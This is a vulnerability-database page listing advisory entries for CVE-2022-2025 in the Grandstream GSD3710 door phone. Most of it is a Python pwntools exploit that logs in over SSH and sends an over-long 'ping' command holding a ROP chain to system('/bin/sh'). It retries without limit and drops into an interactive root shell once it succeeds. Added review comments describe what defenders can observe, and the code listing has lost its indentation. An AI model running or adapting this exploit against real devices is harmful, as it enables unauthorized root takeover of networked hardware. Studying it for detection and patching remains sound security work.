| Reporter | Title | Published | Views | Family |
|---|---|---|---|---|
| CVE-2022-2025 | 23 Sep 2022 20:43 | – | circl | |
| Grandstream GSD3710 缓冲区错误漏洞 | 23 Sep 2022 00:00 | – | cnnvd | |
| CVE-2022-2025 | 23 Sep 2022 15:06 | – | cve | |
| CVE-2022-2025 Grandstream GSD3710 Stack-based Buffer Overflow | 23 Sep 2022 15:06 | – | cvelist | |
| EUVD-2022-34329 | 23 Sep 2022 15:06 | – | euvd | |
| CVE-2022-2025 | 23 Sep 2022 16:15 | – | nvd | |
| CVE-2022-2025 | 23 Sep 2022 16:15 | – | osv | |
| Design/Logic Flaw | 23 Sep 2022 16:15 | – | prion | |
| PT-2022-14472 · Grandstream · Grandstream Gsd3710 | 23 Sep 2022 00:00 | – | ptsecurity | |
#!/usr/bin/env python3
# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow
# Date: 2025-05-29
# Exploit Author: Pepelux
# Vendor Homepage: https://www.grandstream.com/
# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
# Tested on: Linux and MacOS
# CVE: CVE-2022-2025
"""
Author: Jose Luis Verdeguer (@pepeluxx)
Required: Pwntools
Example:
$ python3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD
"""
from struct import pack
import sys
from time import sleep
import argparse
from pwn import *
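def get_args():
    """Parse the command-line options and return ``(ip, user, pwd)``.

    All three options are required. argparse prints a usage message and
    exits on its own when one is missing or malformed.

    Note: the password is read from argv, so it is visible in the process
    list and the shell history of the host that runs this script.

    Returns:
        tuple: the device IP address, username and password, as strings.
    """
    parser = argparse.ArgumentParser(
        formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
            prog, max_help_position=50))

    parser.add_argument('-i', '--ip', type=str, required=True,
                        help='device IP address', dest="ip")
    parser.add_argument('-u', '--user', type=str, required=True,
                        help='username', dest="user")
    parser.add_argument('-p', '--pass', type=str, required=True,
                        help='password', dest="pwd")

    args = parser.parse_args()

    # The original wrapped these attribute reads in try/except ValueError.
    # Reading parsed attributes cannot raise ValueError, so that handler
    # (and its bare exit()) was unreachable and has been dropped.
    return args.ip, args.user, args.pwd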
def check_badchars(payload):
    """Report whether *payload* holds a flagged byte after its 5-byte prefix.

    Offsets 0-4 are never inspected. On the first flagged byte found, a
    warning naming the byte and its offset is logged and True is returned.
    False is returned when no flagged byte is present.
    """
    # CR, LF, ';', '|' and space.
    # NOTE(review): presumably these are bytes the device CLI treats as
    # separators or line ends -- confirm against the device.
    flagged = (0xd, 0xa, 0x3b, 0x7c, 0x20)
    for offset, value in enumerate(payload[5:], start=5):
        if value not in flagged:
            continue
        log.warn("Badchar %s detected at %#x" % (hex(value), offset))
        return True
    return False
# Entry point: builds one fixed `ping` command line and replays it over SSH.
# NOTE(review): this listing lost its indentation during extraction, so the
# nesting described in the comments below is inferred from statement order.
# Defender summary, from the visible code: the script needs valid SSH
# credentials (the issue is reached only after authentication), opens a new
# session to port 22 on every attempt, and sends a 345-byte `ping` line
# (5-byte prefix, 320 filler bytes, five 4-byte words) followed by `id`.
# Repeated logins to the device together with an over-long `ping` argument
# holding non-printable bytes are the observable pattern. The header of this
# file lists firmware 1.0.11.13 and lower as affected.
def main():
ip, user, pwd = get_args()
# Every address below is a fixed offset added to this hard-coded libc base.
libc_base = 0x76bb8000
gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc};
bin_sh = libc_base + 0xCEA9C # /bin/sh
system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc
# Shadows the builtin exit() for the rest of main().
# NOTE(review): the source does not label this offset -- presumably exit@libc, confirm.
exit = libc_base + 0x2660C
print("[*] Libc base: %#x" % libc_base)
print("[*] ROP gadget: %#x" % gadget)
print("[*] /bin/sh: %#x" % bin_sh)
print("[*] system: %#x" % system)
print("[*] exit: %#x\n" % exit)
# 320 filler bytes placed between the `ping ` prefix and the five packed words.
padding = b"A" * 320
payload = b'ping '
payload += padding
payload += p32(gadget)
payload += p32(bin_sh)
payload += b"AAAA"
payload += p32(system)
payload += p32(exit)
# Stop before any connection is made if the helper flags a byte in the payload.
if check_badchars(payload):
sys.exit(0)
count = 1
# No upper bound on attempts: the loop only ends once "root" shows up in the output.
# NOTE(review): resending an identical payload suggests the hard-coded base
# matches only some of the time -- confirm. Each pass is a fresh SSH login,
# so the attempts are visible in the device's authentication log.
while True:
print('Try: %d' % count)
s = ssh(user, ip, 22, pwd)
p = s.shell(tty=False)
# Wait for the device CLI prompt before sending anything.
print(p.readuntil(b"GDS3710> "))
p.sendline(payload)
p.sendline(b"id")
# Fixed one-second wait before reading whatever output has arrived.
sleep(1)
data = p.read()
# Success test is a plain substring match on the stringified output, so
# any "root" text in the reply counts, not only a uid line.
if str(data).find('root') > -1:
print('PWNED!')
p.interactive()
s.close()
sys.exit()
# Reached when "root" was not seen: drop the session and try again.
s.close()
count += 1
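# Run main() only when the file is executed directly, not when imported.
# The stray "Data" that page extraction fused onto the call line was site
# chrome and made the line a syntax error; it is removed here.
if __name__ == '__main__':
    main()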